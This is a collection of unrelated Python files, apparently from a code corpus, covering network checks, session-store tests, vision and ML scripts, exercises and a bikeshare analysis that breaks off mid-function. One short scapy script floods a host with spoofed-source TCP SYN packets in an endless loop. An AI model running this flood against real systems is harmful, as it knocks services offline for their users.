LEFT OUTER JOIN public.user AS usr ON usr.id = ncr.user_id
WHERE ncr.deleted is FALSE
AND loc.deleted is FALSE
AND ($1::BIGINT is NULL OR ncr.user_id = $1::BIGINT)
AND loc.show_on_map IS TRUE
ORDER BY ncr.created_on DESC
"""
|
import requests
import subprocess
import socket
urls = ['https://google.co.uk', 'https://bbc.co.uk']
ips = ["192.168.167.20", "192.168.167.6"]
urlReached = []
urlNotReached = []
reached = []
not_reached = []
reverse_dns = []
def request_test(sites):
for url in urls:
resp = requests.get(url)
respcode = resp.status_code
if respcode == 200:
urlReached.append(url)
else:
urlNotReached.append(url)
def ping_test(ips):
for ip in ips:
ping_test = subprocess.call('ping %s -n 2' % ip)
if ping_test == 0:
reached.append(ip)
else:
not_reached.append(ip)
def nslookup_test(hosts):
for ip in ips:
nslookuptest = socket.getfqdn(ip)
reverse_dns.append(nslookuptest)
ping_test(ips)
request_test(urls)
nslookup_test(ips)
print("these urls were not accessable over http/https : " + str(urlNotReached))
print("these urls were accessable over http/https : " + str(urlReached))
print("these ips were accessable over ping : " + str(reached))
print("these ips were not accessable over ping : " + str(not_reached))
print("these DNS records were resolved from IP list : " + str(reverse_dns))
|
from __future__ import absolute_import, division, unicode_literals
import six
from datetime import datetime
import re
from twisted.trial.unittest import SynchronousTestCase
from twisted.internet.task import Clock
from mimic.session import NonMatchingTenantError, SessionStore
class SessionCreationTests(SynchronousTestCase):
"""
Tests for :class:`SessionStore`.
"""
def test_username_password_new(self):
"""
SessionStore.session_for_username_password creates a new session (if no
such session exists for the given username).
"""
clock = Clock()
sessions = SessionStore(clock)
clock.advance(4321)
session = sessions.session_for_username_password("example_user",
"password")
self.assertEqual(session.username, "example_user")
self.assertEqual(session.expires,
datetime.utcfromtimestamp(4321 + 86400))
self.assertIsInstance(session.tenant_id, six.text_type)
self.assertIsInstance(session.token, six.text_type)
self.assertNotEqual(session.username, session.token)
self.assertNotEqual(session.token, session.tenant_id)
def test_username_password_wrong_tenant(self):
"""
Tenant ID is validated in
:func:`SessionStore.session_for_username_password`.
If called with the token of an existing session but the wrong tenant,
raises :class:`NonMatchingTenantError`.
"""
"""
SessionStore.session_for_username_password, if called with the
username of an existing session but the wrong tenant, raises
:class:`NonMatchingTenantError`.
"""
clock = Clock()
sessions = SessionStore(clock)
clock.advance(4321)
sessions.session_for_username_password("example_user",
"password",
"tenant_orig")
self.assertRaises(
NonMatchingTenantError,
sessions.session_for_username_password,
"example_user", "password", "tenant_new")
def test_different_username_different_token(self):
"""
Sessions are distinct if they are requested with distinct usernames.
"""
sessions = SessionStore(Clock())
a = sessions.session_for_username_password("a", "ignored")
b = sessions.session_for_username_password("b", "ignored")
self.assertNotEqual(a.token, b.token)
def test_by_username_after_token(self):
"""
SessionStore.session_for_username_password should retrieve the same
session that was created by SessionStore.session_for_token. Similarly
for the API key.
"""
sessions = SessionStore(Clock())
a = sessions.session_for_token("testtoken")
b = sessions.session_for_username_password(a.username, "testpswd")
c = sessions.session_for_api_key(a.username, "testapikey")
self.assertIdentical(a, b)
self.assertIdentical(a, c)
def test_session_for_apikey_after_username_wrong_tenant(self):
"""
Tenant ID is validated in :func:`SessionStore.session_for_api_key`.
If called with the token of an existing session but the wrong tenant,
raises :class:`NonMatchingTenantError`.
"""
sessions = SessionStore(Clock())
a = sessions.session_for_username_password("username", "testpswd")
self.assertRaises(
NonMatchingTenantError,
sessions.session_for_api_key,
a.username, "testapikey", a.tenant_id + "wrong")
def test_by_token_after_username(self):
"""
Session retrieved by all the ``session_for_*`` methods are identical.
:func:`SessionStore.session_for_token` should retrieve the same
session that was created by
:func:`SessionStore.session_for_username_password`.
"""
sessions = SessionStore(Clock())
a = sessions.session_for_username_password("username",
"testpswd")
b = sessions.session_for_token(a.token)
self.assertIdentical(a, b)
c = sessions.session_for_api_key("apiuser", "testkey")
d = sessions.session_for_token(c.token)
self.assertIdentical(c, d)
def test_by_token_after_username_wrong_tenant(self):
"""
Tenant ID is validated in :func:`SessionStore.session_for_token`.
If called with the token of an existing session but the wrong tenant,
raises :class:`NonMatchingTenantError`.
"""
sessions = SessionStore(Clock())
a = sessions.session_for_username_password("username",
"testpswd")
self.assertRaises(
NonMatchingTenantError,
sessions.session_for_token,
a.token, a.tenant_id + 'wrong')
def test_impersonation(self):
"""
SessionStore.session_for_impersonation will return a session that can
be retrieved by impersonated token_id or username.
"""
clock = Clock()
sessions = SessionStore(clock)
A_LITTLE = 1234
clock.advance(A_LITTLE)
A_LOT = 65432
a = sessions.session_for_impersonation("pretender", A_LOT)
a_prime = sessions.session_for_impersonation("pretender", A_LOT)
self.assertIdentical(a, a_prime)
b = sessions.session_for_token(a.token)
self.assertEqual(
a.expires, datetime.utcfromtimestamp(A_LITTLE + A_LOT))
self.assertIdentical(a, b)
c = sessions.session_for_username_password("pretender",
"not a password")
self.assertIdentical(a, c)
self.assertEqual(a.username, c.username)
self.assertEqual(a.tenant_id, c.tenant_id)
# Right now all data_for_api cares about is hashability; this may need
# to change if it comes to rely upon its argument actually being an API
# mock.
same_api = 'not_an_api'
username_data = c.data_for_api(same_api, list)
token_data = b.data_for_api(same_api, list)
impersonation_data = a.data_for_api(same_api, list)
self.assertIs(username_data, impersonation_data)
self.assertIs(token_data, impersonation_data)
def test_session_for_tenant_id(self):
"""
SessionStore.session_for_tenant_id will return a session that can be
retrieved by tenant_id.
"""
clock = Clock()
sessions = SessionStore(clock)
session = sessions.session_for_username_password("someuser",
"testpass")
session2 = sessions.session_for_tenant_id(session.tenant_id)
self.assertIdentical(session, session2)
def test_generate_username_from_tenant_id(self):
"""
SessionStore.session_for_tenant_id will create a new session with a
synthetic username if no such tenant ID yet exists.
"""
clock = Clock()
sessions = SessionStore(clock)
session = sessions.session_for_tenant_id("user_specified_tenant")
session2 = sessions.session_for_username_password(session.username,
"testpass")
self.assertIdentical(session, session2)
def test_session_for_tenant_id_with_custom_tenant(self):
"""
SessionStore.session_for_tenant_id will return a session that can be
retrieved by tenant_id.
"""
clock = Clock()
sessions = SessionStore(clock)
session = sessions.session_for_username_password(
"someuser", "testpass", "sometenant"
)
session2 = sessions.session_for_tenant_id("sometenant")
self.assertIdentical(session, session2)
def test_sessions_created_all_have_integer_tenant_ids(self):
"""
Sessions created by
:class:`SessionStore.session_for_username_password`,
:class:`SessionStore.session_for_impersonation`,
:class:`SessionStore.session_for_api_key`, and
:class:`SessionStore.session_for_token`, when not passed a specific
tenant ID, all generate integer-style tenant IDs.
"""
clock = Clock()
sessions = SessionStore(clock)
sessions = [
sessions.session_for_username_password("someuser1", "testpass"),
sessions.session_for_impersonation("someuser2", 12),
sessions.session_for_api_key("someuser3", "someapikey"),
sessions.session_for_token("sometoken"),
]
integer = re.compile('^\d+$')
for session in sessions:
self.assertIsNot(integer.match(session.tenant_id), None,
"{0} is not an integer.".format(
session.tenant_id))
self.assertTrue(int(session.tenant_id) < 1e15)
def test_sessions_created_honor_specified_tenant_id(self):
"""
Sessions created by
:class:`SessionStore.session_for_username_password`,
:class:`SessionStore.session_for_api_key`, and
:class:`SessionStore.session_for_token`,
:class:`SessionStore.session_for_tenant_id` all honor the passed-in
tenant ID.
"""
clock = Clock()
sessions = SessionStore(clock)
sessions = [
sessions.session_for_username_password("user1", "pass",
"tenant1"),
sessions.session_for_api_key("user2", "apikey",
tenant_id="tenant2"),
sessions.session_for_token("token", tenant_id="tenant3"),
sessions.session_for_tenant_id("tenant4")
]
for i, session in enumerate(sessions):
self.assertEqual("tenant{0}".format(i + 1), session.tenant_id)
def test_token_after_api_key_specifying_tenant(self):
"""
Sessions created by
:class:`SessionStore.session_for_api_key` and specifying
the tenant ID should be returned on requests to
:class:`SessionStore.session_for_token` that also specify
the same tenant ID.
"""
clock = Clock()
sessions = SessionStore(clock)
session_by_api_key = sessions.session_for_api_key(
"user1", "f005ba11", tenant_id="559638")
session_by_token = sessions.session_for_token(
"token", tenant_id="559638")
self.assertIs(session_by_api_key, session_by_token)
def test_username_password_after_token_specifying_tenant(self):
"""
Sessions created by
:class:`SessionStore.session_for_token` and specifying
the tenant ID should be returned on requests to
:class:`SessionStore.session_for_username_password` that
also specify the same tenant ID.
"""
clock = Clock()
sessions = SessionStore(clock)
session_by_token = sessions.session_for_token("token", tenant_id="tenant1337")
session_by_username_password = sessions.session_for_username_password(
"user1", "pass", "tenant1337")
self.assertIs(session_by_token, session_by_username_password)
|
class Configs(object):
"""
Configs(Routes) for the whole detection/tracking system
"""
def __init__(self):
""" Sever or Local """
self.S_or_L = 'S' # running on sever or local environment. 's' or 'S': sever, 'l' or 'L': local
# self.VID_NAME = '/Users/huike/master/video/demo.mp4'
self.VID_NAME = 'demo.mp4'
self.VID_SAVING_NAME = 'save_video'
self.VID_SAVING_BLOB_NAME = 'VID_SAVING_BLOB_NAME'
"""
Detector
"""
self.AREA_MAXIMUM = 10000000 # Instance which area is bigger than this number will not be regarded as an
# independent instance
self.AREA_MINIMUM = 400 # Instance which area is smaller than this number will not be regarded as a
# valid instance
self.WH_RATIO_THRE = 3 # max(width, height) / min(width, height)
self.COOLING_FRAME = 100 # For some reasons, yolo is not good enough to detect blurred objects. We guess blob
# analysis may be a better choice thus we need a time to build up our background.
self.BACK_HISTORY_FRAME = 300 # We use these frames to build up background model in real sense.
# It should be less than COOLING_FRAME
self.BACK_THRESHOLD = 100 # Threshold of background model. The higher, the more inertial.
self.BACK_IF_DETECT_SHADOW = False # Whether to detect shadow
self.BACK_RESIZE_BORDER = 480
self.BACK_RESIZE_HEIGHT = 240
self.BACK_RESIZE_WIDTH = 320
self.USE_RE_MODEL = False
"""
# Multiple Object Controller Parameters
"""
# it's better to set to ratio of bboxes cause smaller ones means shorter dist and vice versa.
self.MAX_PIXELS_DIST_BETWEEN_PREDICTED_AND_DETECTED = 45
# detect per NUM_JUMP_FRAMES frames. D, N, N, N, D, N, ...
self.NUM_JUMP_FRAMES = 5
self.VELOCITY_DIRECTION_SEPARATOR = 90
"""
# Instance Parameters
"""
# An instance will be deleted if we cannot detected it after this number
self.MAX_NUM_MISSING_PERMISSION = self.NUM_JUMP_FRAMES+1
# An instance will be showed if we detected it more than this number
self.MIN_CONTINUE_DETECTOR = 2
# We save historical frames for each instance within this number
self.HISTORY_SIZE = 20
# we need to do get rid of those identical instances generated
# but it's not good in real experiments
self.INSTANCE_IDENTICAL_THRESHOLD = 50
# so we set iou threshold to do the same thing
self.INSTANCE_IDENTICAL_IOU_THRESHOLD = 0.3
# we also set ios (inter over self) threshold
# for conditions where two instances' areas are different tremendously
self.BBXES_IDENTICAL_IOS_TRHESHOLD = 0.35
# If bbx remains same within this # of frames, we delete it.
self.NUM_DELETE_STILL = self.NUM_JUMP_FRAMES + 1
"""
Visualizer Parameters
"""
# By using CPU, we can use this flag to decide whether to show results directly or not
self.to_show = False
self.show_path = 'vis/' # save images path
# If the video is too long, we gonna stop it at this frame
self.FINISH_CUT_FRAME = 0
self.COLOR_FADING_PARAM = self.HISTORY_SIZE
self.SHOW_FRAME_ID = True
self.SHOW_COLLISION_THRE = 50
self.SHOW_TRACKS = True
|
import matplotlib as mpl
mpl.use('Agg')
import utils
import os
import time
import argparse
import torch
import torch.utils.data
import torchvision.datasets as dset
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from tqdm import tqdm
from options import TestOptions
from loader import PepeLoader
from models import Pix2PixModel
# CUDA_VISIBLE_DEVICES
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
# Parse options
opt = TestOptions().parse()
if __name__ == '__main__':
# pix2pix model
model = Pix2PixModel()
model.initialize(opt)
dataset = PepeLoader(
opt.dataroot,
transform=transforms.Compose(
[transforms.Scale(opt.loadSize),
transforms.RandomCrop(opt.fineSize),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))
]
),
train=False
)
dataloader = torch.utils.data.DataLoader(
dataset, batch_size=1, shuffle=True, pin_memory=True
)
total_steps = 0
for idx, data in enumerate(tqdm(dataloader)):
if idx > opt.how_many:
break
model.set_input({
'A': data[0],
'B': data[1]
})
model.test()
visuals = model.get_current_visuals()
utils.mkdir('results')
f, (ax1, ax2, ax3) = plt.subplots(
3, 1, sharey='row'
)
ax1.imshow(visuals['real_A'])
ax1.set_title('real A')
ax2.imshow(visuals['fake_B'])
ax2.set_title('fake B')
ax3.imshow(visuals['real_B'])
ax3.set_title('real B')
f.savefig('results/{}.png'.format(int(time.time())))
|
'''
There is a new mobile game that starts with consecutively numbered clouds. Some of the clouds are thunderheads and others are cumulus. The player can jump on any cumulus cloud having a number that is equal to the number of the current cloud plus or
. The player must avoid the thunderheads. Determine the minimum number of jumps it will take to jump from the starting postion to the last cloud. It is always possible to win the game.
For each game, you will get an array of clouds numbered
if they are safe or if they must be avoided.
7, 0 0 1 0 0 1 0 : 4
6, 0 0 0 1 0 0 : 3
'''
def jumpingOnClouds(c):
jumps = 0
step = 0
n = len(c)
# print("Length:", n)
if n < 2:
return 0
for x in range(n):
x = step
# print("X:", x)
if x+2 < n and c[x+2] == 0:
jumps += 1
step += 2
elif x+1 < n and c[x+1] == 0:
jumps += 1
step += 1
if step == n-1:
break
print(jumps)
return jumps
jumpingOnClouds([0, 0, 1, 0, 0, 1, 0])
jumpingOnClouds([0,0,0,1,0,0]) |
# Written by Sarika Azad(5172690) for COMP9021
from linked_list_adt import *
class ExtendedLinkedList(LinkedList):
def __init__(self, L = None):
super().__init__(L)
def rearrange(self):
value_1 = self.head.value
value_2 = self.head.next_node.value
if value_2 % 2 == 1 and value_1 % 2 ==0:
node = self.head.next_node
next_node = node.next_node
node.next_node = self.head
self.head = node
node.next_node.next_node = next_node
try:
while True:
node = self.head
counter=len(self)-1
for i in range(1,len(self)):
try:
n1 = node.next_node
value_1 = n1.value
n2 = n1.next_node
value_2 = n2.value
n1 = node.next_node
value_1 = n1.value
except AttributeError:
value_2 = None
value_1 = None
try:
n3 = n2.next_node
except AttributeError:
value_3 = None
if value_1 and value_2 and value_2 % 2 == 1 and value_1 % 2 ==0:
if value_2 != None:
n2.next_node = None
n1.next_node = n3
node.next_node = n2
n2.next_node = n1
counter+= -1
node = node.next_node
if counter == len(self)-1:
raise ValueError
except ValueError:
pass
return self
|
from .meta import Meta
class Module(Meta):
pass
|
#!/usr/bin/env python
#Adding the necessary libraries to parse files, alter system files, and upload to drive
import argparse, os
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
#Parses for necessary arguments of filename and folder location within documents
parser = argparse.ArgumentParser()
parser.add_argument("-N","--name",required = True)
parser.add_argument("-P", "--path")
parser.add_argument("-F", "--filetype")
parser.add_argument("-T", "--template")
#Creates a dictionary of the inputs with the --___ corresponding to the key
args = vars(parser.parse_args())
if args['path'] == None:
args['path']='Math'
#if args['filetype'] == None:
# args['filetype'] = '.tex'
if args['template'] == None:
args['template'] = '/home/amanshah/.vim/bundle/vim-latex/ftplugin/latex-suite/templates/homework.tex'
#File creation in the local system
filename = '/home/amanshah/Documents/{}'.format(args['path'])
filedir = '/home/amanshah/Documents/%s/%s' %(args['path'],args['name'])
if not os.path.exists(filedir):
os.makedirs(filedir[:len(filedir) - 4])
file_loc = filedir[:len(filedir) - 4] +'/' + args['name']
fil = open(file_loc, 'w+')
with fil as f:
with open(args['template']) as f1:
for line in f1:
f.write(line)
f1.close()
fil.close()
#Google Account Authorization using .json file in the same directory as this file
gauth = GoogleAuth()
gauth.LocalWebserverAuth()
drive = GoogleDrive(gauth)
#File Uploading to drive and content addition
uploaded = drive.CreateFile({'title': args['name']})
uploaded.SetContentFile(file_loc)
uploaded.Upload()
|
html_doc = """
<html><head><title>The Dormouse's story</title></head>
<body>
<p class="title"><b>The Dormouse's story</b></p>
<p class="story">Once upon a time there were three little sisters; and their names were
<a href="http://example.com/elsie" class="sister" id="link1">Elsie</a>,
<a href="http://example.com/lacie" class="sister" id="link2">Lacie</a> and
<a href="http://example.com/tillie" class="sister" id="link3">Tillie</a>;
and they lived at the bottom of a well.</p>
<p class="story">...</p>
"""
from bs4 import BeautifulSoup
soup = BeautifulSoup(html_doc, 'html.parser')
# 获取head标签
print(soup.head)
print(soup.title)
# 获取<body>标签中的第一个<b>标签
print(soup.body.b)
# 获得当前名字的第一个tag
print(soup.a)
# 所有的<a>标签
print(soup.find_all("a"))
# tag的 .contents 属性可以将tag的子节点以列表的方式输出
head_tag = soup.head
print(head_tag)
print(head_tag.contents)
title_tag = head_tag.contents[0]
print(title_tag)
print(title_tag.contents)
# BeautifulSoup 对象本身一定会包含子节点,也就是说<html>标签也是 BeautifulSoup 对象的子节点:
print(len(soup.contents))
print(soup.contents[0].name)
# text = title_tag.contents[0]
# print(text.contents)
# 通过tag的 .children 生成器,可以对tag的子节点进行循环
for child in title_tag.children:
print(child)
# .descendants 属性可以对所有tag的子孙节点进行递归循环
for child in head_tag.descendants:
print(child)
print(len(list(soup.children)))
print(len(list(soup.descendants)))
print(title_tag.string)
print(head_tag.string)
# 如果tag中包含多个字符串,可以使用 .strings 来循环获取,但是会输出很多空格或空行
for string in soup.strings:
print(repr(string))
# 使用 .stripped_strings 可以去除多余空白内容
for string in soup.stripped_strings:
print(repr(string)) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def odd_iter():
n = 1
while True:
n = n + 2
yield n
def _not_divisible(n):
return lambda x: x%n > 0
def outputPrime():
#The first number is 2:
yield 2
initial = odd_iter()
while True:
n = next(initial)
yield n
ini = filter(_not_divisible(n),initial)
for n in outputPrime():
if n < 20:
print (n)
else:
break
|
from scapy.all import *
from scapy.layers.inet import *
# scapy
def tcp_syn():
target_ip = "192.168.106.3"
target_port = 9000
ip = IP(src=RandIP(), dst=target_ip)
tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
raw = Raw(b"X"*1024)
p = ip / tcp / raw
send(p, loop=1, verbose=0)
if __name__ == '__main__':
tcp_syn()
|
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import KFold
from sklearn.datasets import load_boston
from sklearn.preprocessing import scale
import numpy as np
from sklearn.model_selection import cross_val_score
import pandas as pn
data = load_boston()
scale(data.data)
cv = KFold(n_splits=5,shuffle=True,random_state=42)
acc = list()
for p in np.linspace(start=1,stop=10,num=200):
neigh = KNeighborsRegressor(n_neighbors=5, weights='distance',p=p)
acc.append(cross_val_score(neigh, data.data, data.target,cv=cv,scoring='neg_mean_squared_error').mean())
# print(acc) -21.056657
print(pn.DataFrame({'acc':acc, 'p':np.linspace(start=1,stop=10,num=200)}).sort_values(by=['acc'],ascending=False)) |
import cv2
import numpy as np
import json
import os
import pandas as pd
# 실습 1
# face_cascade = cv2.CascadeClassifier('../0706_data/haarcascade_frontalface_default.xml')
#
# img = cv2.imread('../0706_data/face.jpg')
# gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#
# faces = face_cascade.detectMultiScale(gray, 1.3, 1)
#
# print(faces)
#
# _list = list(faces)
# cnt = 0
# while _list:
# x_pos = []
# y_pos = []
# for idx in _list:
# for j in range(len(idx)):
# if j < 2:
# x_pos.append(idx[j])
# else:
# y_pos.append(idx[j])
# img = cv2.rectangle(img, (x_pos[0], x_pos[1]), (x_pos[0]+y_pos[0],x_pos[1]+y_pos[1]), (0, 255, 0), 3)
# cnt += 1
# print(cnt, idx)
# _list.pop(0)
# break
#
#
#
#
# img = cv2.rectangle(img,(5,20),(69,69),(0,255,0),3)
# cv2.imshow('',img)
# cv2.waitKey()
#
#실습 2
img = cv2.imread('../0706_data/test_img3.jpg')
print(img.shape)
height = img.shape[0]
width = img.shape[1]
h = int((500-height)/2)
w = int((500-width)/2)
img_pad = cv2.cv2.copyMakeBorder(img,h,h,w,w,cv2.BORDER_CONSTANT, value=[0,0,0]) # top bottom left right , 중심에 놓겠다 , 검은색 패딩하겠다
print (img_pad.shape)
cv2.imshow('img pad',img_pad)
cv2.waitKey()
pad_cas = cv2.CascadeClassifier('../0706_data/haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(img_pad, cv2.COLOR_BGR2GRAY)
faces = pad_cas.detectMultiScale(gray, 1.3, 1)
print(faces)
_list = list(faces)
cnt = 0
dicli = []
while _list:
_dict = {}
for idx in _list:
_dict['object'] = 'person{}'.format(cnt)
_dict['box'] = list(idx)
dicli.append(_dict)
_list.pop(0)
cnt += 1
break
print(dicli)
#
#
# # 실습 3
#
#
# img = cv2.imread('../0706_data/test_img3.jpg')
#
# for dic in dicli:
# face_pos = dic['box']
# print(face_pos)
# img = cv2.cv2.copyMakeBorder(img,h,h,w,w,cv2.BORDER_CONSTANT, value=[0,0,0]) # top bottom left right , 중심에 놓겠다 , 검은색 패딩하겠다
#
# cv2.imshow('json to pad',img)
# cv2.waitKey() |
''' Utility methods for performing database operations '''
''' Trying to mimic a actual database server '''
import uuid
users = [
{
"_id": "7a7f4f7f-19fb-4266-b1cf-666158cf17fb",
"first_name":"Virat",
"last_name": "Kohli",
"email": "imvk@gmail.com"
},
{
"_id": "e4dc6add-956e-4bc5-8122-047ef2ca42e3",
"first_name":"Rohit",
"last_name": "Sharma",
"email": "hitman@gmail.com"
},
{
"_id": "b6b66d84-6aff-4c7a-9897-775920e76787",
"first_name":"Jasprit",
"last_name": "Bumrah",
"email": "boomboom@ggmail.com"
},
{
"_id": "ae21491d-d7fc-498d-b2f9-5f6d015a62b8",
"first_name":"Ajinkya",
"last_name": "Rahane",
"email": "merahane@gmail.com"
}
]
def get_all_users():
return users
def get_user_by_id(user_id):
filtered_usres = list(filter(lambda obj: obj["_id"] == user_id, users))
if len(filtered_usres) > 0:
return filtered_usres[0]
raise Exception("Invalid User Id")
def add_user(user_details):
user_id = str(uuid.uuid4())
user = {
"_id": user_id,
** user_details
}
users.append(user)
return user
def update_user(updated_details):
user_id = updated_details["_id"]
del updated_details["_id"]
index = -1
for i in range(len(users)):
if user_id == users[i]["_id"]:
index = i
break
if index == -1:
raise Exception("No user found with given Id")
user = users[index]
for key in updated_details:
user[key] = updated_details[key]
users[index] = user
return user
|
# Bài 09: Viết hàm đếm số lần xuất hiện các ký tự trong một String
# Ví dụ:
# Input: ‘Stringings’
# Output: {‘S’: 1, ‘t’: 1, ‘r’: 1, ’i’: 2, ‘n’: 2, ‘g’: 2, ‘s’: 1}
s = 'Stringings'
my_dict = {i : s.count(i) for i in s}
print(my_dict)
|
"""Deployment Services Classes."""
import logging
from .deployabledevices import DeployableDevices
from .deploymentrequests import DeploymentRequests
logging.debug("In the deployment_services __init__.py file.")
__all__ = ["DeployableDevices", "DeploymentRequests"]
|
# Generated by Django 3.1.4 on 2020-12-13 10:05
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='followlist',
name='followings',
field=models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL),
),
]
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
MY_MODULES = {
'block':'Block',
'mblock':'mBlock',
'sinblock':'sinBlock',
'videostream':'MjpegStream',
} |
# -*- coding: utf-8 -*-
import test
import auto_encoder
import writer
import time
if __name__=="__main__":
alll = time.time()
# アイテム数
item = 1
# 入力次元数
num_input = 10000
# 隠れ1層のユニット数
num_hidden = 100
# イテレーション回数
iteration = 10
yy = open("../Rakuten-real-/userID150-165.csv")
box = []
for user in yy:
box.append(user[:-1])
#g2 = open("../rakutendb/item_vec_nmf150-165ver1.100_userID/matrix_ver2.csv")
g2 = open("../../../Desktop/matrix_ver2.csv")
mat = []
for i in g2:
mat.append(i[:-1])
g2.close()
dic = {}
a = open("../Rakuten-real-/item_code150-165.csv")
count = 0
for u in a:
dic[u[:-1]] = count
count += 1
a.close()
for index in range(250,500):
aa = []
ra = []
gg = open("../rakutendb/150-165/"+box[index]+".csv")
for ii in gg:
oo = ii[:-1].split(",")
aa.append(oo[0] + "a")
ra.append(oo[1])
lis = []
ij = 0
for item_code in aa:
if item_code[:-1].find("http") > -1:
continue
lis.append(item_code[:-1])
ij += 1
count = 0
x = {}
for i in xrange(len(lis)):
g = open("../rakutendb/item_vec_bow150-165ver1.5/"+lis[i]+".csv")
for vec in g:
x[i] = []
li = vec[:-1].split(",")
for val in li:
if float(val) != 0:
x[i].append(float(val)/float(val))
else:
x[i].append(float(val))
#vv = mat[dic[lis[i]]].split(",")
#del vv[len(vv)-1]
#for jj in vv:
# x[i].append(float(jj))
neural = auto_encoder.NeuralNet(num_input,num_hidden,x,iteration,"Denoise")
neural.run()
wr = writer.csv("../rakutendb/item_vec_ae150-165ver1.100.7_userID/"+str(box[index]))
for i in xrange(len(lis)):
a = neural.extract(i)
b = ""
for j in xrange(len(a.data[0])):
b += str(a.data[0][j]) + ","
wr.write(b[:-1])
#if j != len(lis)-1:
# wr.write("\n")
#l1 = neural.extract_Hidden()
#gg = open("./150-165/"+box[index]+"_Hidden.csv","w")
#for value in l1:
#for vbn in value:
#gg.write(str(vbn)+"\n")
print time.time() - alll
|
import win32com.client
import pythoncom
import Login as login
class XAQueryEvent :
query_state = 0
def OnReceiveData(self, code):
XAQueryEvent.query_state = 1
def ProcT1102(self):
self = win32com.client.DispatchWithEvents("XA_DataSet.XAQuery", XAQueryEvent)
self.ResFileName = "C:\\eBEST\\xingAPI\\Res\\t1102.res"
self.SetFieldData("t1102InBlock", "shcode", 0, "078020")
self.Request(0)
while XAQueryEvent.query_state == 0:
pythoncom.PumpWaitingMessages()
name = self.GetFieldData("t1102OutBlock", "hname", 0)
price = self.GetFieldData("t1102OutBlock", "price", 0)
print(name)
print(price)
if __name__ == "__main__":
inXASession = login.XASessionEvents()
inXASession.ProcLogin()
inXAQuery = XAQueryEvent()
inXAQuery.ProcT1102()
|
from flask import render_template
from flask_login import current_user
from util.logutils import loghelpers
import logging
logger = logging.getLogger(__name__)
@loghelpers.log_decorator()
def about():
# logger.debug(f"{current_user=}")
# logger.debug(f"{current_user.__dict__=}")
return render_template(
"about.html",
# loggedin=current_user.is_authenticated
) |
from flask import Blueprint
from flask.json import jsonify
from ckanpackager.lib.utils import BadRequestError, NotAuthorizedError
error_handlers = Blueprint('error_handlers', __name__)
@error_handlers.app_errorhandler(BadRequestError)
def handle_bad_request(err):
response = jsonify({
'status': 'failed',
'error': 'BadRequestError',
'message': str(err)
})
response.status_code = 400
return response
@error_handlers.app_errorhandler(NotAuthorizedError)
def handle_not_authorized(err):
response = jsonify({
'status': 'failed',
'error': 'NotAuthorizedError',
'message': str(err)
})
response.status_code = 401
return response |
x=int(input("Enter a number"))
y=int(input("Enter a second number"))
if x != 0 and y!=0:
H=x**2+y**2
print(H**0.5)
else:
print("PAY MORE ATTENTION")
|
from django.db import models
from django import forms
from django.forms import ModelForm, Textarea
from .models import Post
class PostForm(ModelForm):
class Meta:
model = Post
fields = ['title', 'text', 'image']
labels = {
'title': '',
'text': '',
'image': (''),
}
def __init__(self, *args, **kwargs):
super(PostForm, self).__init__(*args, **kwargs)
self.fields['title'].widget.attrs.update({
'placeholder': 'Введите название статьи'
})
|
import time
import pandas as pd
import numpy as np
CITY_DATA = { 'chicago': 'chicago.csv',
'new york city': 'new_york_city.csv',
'washington': 'washington.csv' }
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
"""
print('Hello! Let\'s explore some US bikeshare data!')
user_city_input= input("Enter the city name (Chicago or New york or Washington)\n").strip()
city= user_city_input.title()
while (city != "Chicago" and city != "New York" and city != "Washington" ):
print("invalid input, try again")
user_city_input= input ("Enter the city name (Chicago or New york or Washington)\n").strip()
city= user_city_input.title()
# TO DO: get user input for month (all, january, february, ... , june)
user_month_input= input("Enter the month (all, january, february, ... , june). Type 'all' for no time filter\n").strip()
month= user_month_input.title()
while (month != "All" and month != "January" and month != "February" and month != "March" and month != "April" and month != "May" and month != "June"):
print("invalid input, try again")
user_month_input= input ("Enter the month (all, january, february, ... , june). Type 'all' for no month filter\n").strip()
month= user_month_input.title()
# TO DO: get user input for day of week (all, monday, tuesday, ... sunday)
user_day_input= input("Enter the day of week (all, monday, tuesday, ... sunday). Type 'all' for no day filter\n").strip()
day= user_day_input.title()
while (day != "All" and day != "Monday" and day != "Tuesday" and day != "Wednesday" and day != "Thursday" and day != "Friday" and day != "Saturday" and day != "Sunday"):
print("invalid input, try again")
user_day_input= input ("Enter the day of week (all, monday, tuesday, ... sunday). Type 'all' for no day filter\n").strip()
day= user_day_input.title()
print("You chose the following: City:", city, "Month:",month,"Day:", day)
print('-'*40)
return city, month, day
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
if city == 'Chicago':
df = pd.read_csv(CITY_DATA['chicago'])
elif city == 'New York':
df = pd.read_csv(CITY_DATA['new york city'])
else:
df = pd.read_csv(CITY_DATA['washington'])
df['Start Time'] = pd.to_datetime(df['Start Time'])
df['End Time'] = pd.to_datetime(df['End Time'])
df['day'] = df['Start Time'].dt.day_name()
df['month'] = df['Start Time'].dt.month_name()
if month != 'All':
df = df[df['month'] == month]
if day != 'All':
df = df[df['day'] == day]
return df
def time_stats(df):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
# TO DO: display the most common month
popular_month = df['month'].mode()[0]
print('Most common month:\n{} \n'.format(popular_month))
# TO DO: display the most common day of week
